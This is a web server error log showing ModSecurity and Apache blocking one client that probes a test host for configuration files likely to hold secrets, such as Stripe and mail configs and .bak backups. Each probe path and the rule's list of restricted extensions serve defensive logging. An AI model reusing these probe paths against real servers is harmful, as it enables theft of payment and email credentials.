[Fri Jan 16 03:21:03.276617 2026] [:error] [pid 1444034] [client 45.148.10.246:40702] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/02-mail.config"] [unique_id "aWmgj-RfEYyDES-ZFL4ipwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/02-mail.config
[Fri Jan 16 03:21:03.276942 2026] [:error] [pid 1444034] [client 45.148.10.246:40702] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/02-mail.config"] [unique_id "aWmgj-RfEYyDES-ZFL4ipwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/02-mail.config
[Fri Jan 16 03:21:03.277102 2026] [:error] [pid 1444034] [client 45.148.10.246:40702] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/02-mail.config"] [unique_id "aWmgj-RfEYyDES-ZFL4ipwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/02-mail.config
[Fri Jan 16 03:21:03.400999 2026] [:error] [pid 1444033] [client 45.148.10.246:40704] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/02-mail.config"] [unique_id "aWmgj9LJkp65ULFQ2YYiwQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/02-mail.config
[Fri Jan 16 03:21:03.401352 2026] [:error] [pid 1444033] [client 45.148.10.246:40704] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/02-mail.config"] [unique_id "aWmgj9LJkp65ULFQ2YYiwQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/02-mail.config
[Fri Jan 16 03:21:03.401527 2026] [:error] [pid 1444033] [client 45.148.10.246:40704] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/02-mail.config"] [unique_id "aWmgj9LJkp65ULFQ2YYiwQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/02-mail.config
[Fri Jan 16 03:21:03.518009 2026] [:error] [pid 1444226] [client 45.148.10.246:40708] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/stripe.config"] [unique_id "aWmgj2cpoCUgeFICb0bf4QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/stripe.config
[Fri Jan 16 03:21:03.518333 2026] [:error] [pid 1444226] [client 45.148.10.246:40708] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/stripe.config"] [unique_id "aWmgj2cpoCUgeFICb0bf4QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/stripe.config
[Fri Jan 16 03:21:03.518517 2026] [:error] [pid 1444226] [client 45.148.10.246:40708] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/stripe.config"] [unique_id "aWmgj2cpoCUgeFICb0bf4QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/stripe.config
[Fri Jan 16 03:21:03.877622 2026] [:error] [pid 1444040] [client 45.148.10.246:40718] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/stripe.config"] [unique_id "aWmgj_n_5sIyKhJ5GAzazwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/stripe.config
[Fri Jan 16 03:21:03.877966 2026] [:error] [pid 1444040] [client 45.148.10.246:40718] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/stripe.config"] [unique_id "aWmgj_n_5sIyKhJ5GAzazwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/stripe.config
[Fri Jan 16 03:21:03.878139 2026] [:error] [pid 1444040] [client 45.148.10.246:40718] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/stripe.config"] [unique_id "aWmgj_n_5sIyKhJ5GAzazwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/stripe.config
[Fri Jan 16 03:21:04.029806 2026] [:error] [pid 1444031] [client 45.148.10.246:40730] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/stripe.config"] [unique_id "aWmgkH-9MmrgwjmYTAJTwQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/stripe.config
[Fri Jan 16 03:21:04.030133 2026] [:error] [pid 1444031] [client 45.148.10.246:40730] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/stripe.config"] [unique_id "aWmgkH-9MmrgwjmYTAJTwQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/stripe.config
[Fri Jan 16 03:21:04.030308 2026] [:error] [pid 1444031] [client 45.148.10.246:40730] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/stripe.config"] [unique_id "aWmgkH-9MmrgwjmYTAJTwQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/stripe.config
[Fri Jan 16 03:21:04.233046 2026] [:error] [pid 1444034] [client 45.148.10.246:40740] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-stripe.config"] [unique_id "aWmgkORfEYyDES-ZFL4iqAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/01-stripe.config
[Fri Jan 16 03:21:04.233383 2026] [:error] [pid 1444034] [client 45.148.10.246:40740] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-stripe.config"] [unique_id "aWmgkORfEYyDES-ZFL4iqAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/01-stripe.config
[Fri Jan 16 03:21:04.233554 2026] [:error] [pid 1444034] [client 45.148.10.246:40740] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-stripe.config"] [unique_id "aWmgkORfEYyDES-ZFL4iqAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.ebextensions/01-stripe.config
[Fri Jan 16 03:21:04.571446 2026] [:error] [pid 1444226] [client 45.148.10.246:40768] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-stripe.config"] [unique_id "aWmgkGcpoCUgeFICb0bf4gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/01-stripe.config
[Fri Jan 16 03:21:04.571794 2026] [:error] [pid 1444226] [client 45.148.10.246:40768] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-stripe.config"] [unique_id "aWmgkGcpoCUgeFICb0bf4gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/01-stripe.config
[Fri Jan 16 03:21:04.571954 2026] [:error] [pid 1444226] [client 45.148.10.246:40768] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-stripe.config"] [unique_id "aWmgkGcpoCUgeFICb0bf4gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.ebextensions/01-stripe.config
[Fri Jan 16 03:21:04.788330 2026] [:error] [pid 1444032] [client 45.148.10.246:40776] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-stripe.config"] [unique_id "aWmgkOkMvq8uPO2ZciWrPgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/01-stripe.config
[Fri Jan 16 03:21:04.788680 2026] [:error] [pid 1444032] [client 45.148.10.246:40776] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-stripe.config"] [unique_id "aWmgkOkMvq8uPO2ZciWrPgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/01-stripe.config
[Fri Jan 16 03:21:04.788859 2026] [:error] [pid 1444032] [client 45.148.10.246:40776] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ebextensions/01-stripe.config"] [unique_id "aWmgkOkMvq8uPO2ZciWrPgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.ebextensions/01-stripe.config
[Fri Jan 16 03:21:05.368777 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:40782] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/email.php
[Fri Jan 16 03:21:05.577344 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:40786] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/email.php
[Fri Jan 16 03:21:05.702984 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:40796] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/stripe.php
[Fri Jan 16 03:21:05.877469 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:40806] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/stripe.php/
[Fri Jan 16 03:21:06.048346 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:40822] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/stripe.php
[Fri Jan 16 03:21:06.186025 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:40826] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/stripe.php
[Fri Jan 16 03:21:06.344378 2026] [:error] [pid 1444040] [client 45.148.10.246:40838] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.bak"] [unique_id "aWmgkvn_5sIyKhJ5GAza0QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/mail.php.bak
[Fri Jan 16 03:21:06.344732 2026] [:error] [pid 1444040] [client 45.148.10.246:40838] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.bak"] [unique_id "aWmgkvn_5sIyKhJ5GAza0QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/mail.php.bak
[Fri Jan 16 03:21:06.344893 2026] [:error] [pid 1444040] [client 45.148.10.246:40838] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.bak"] [unique_id "aWmgkvn_5sIyKhJ5GAza0QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/mail.php.bak
[Fri Jan 16 03:21:06.646658 2026] [:error] [pid 1444034] [client 45.148.10.246:40862] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.bak"] [unique_id "aWmgkuRfEYyDES-ZFL4iqgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//config/mail.php.bak
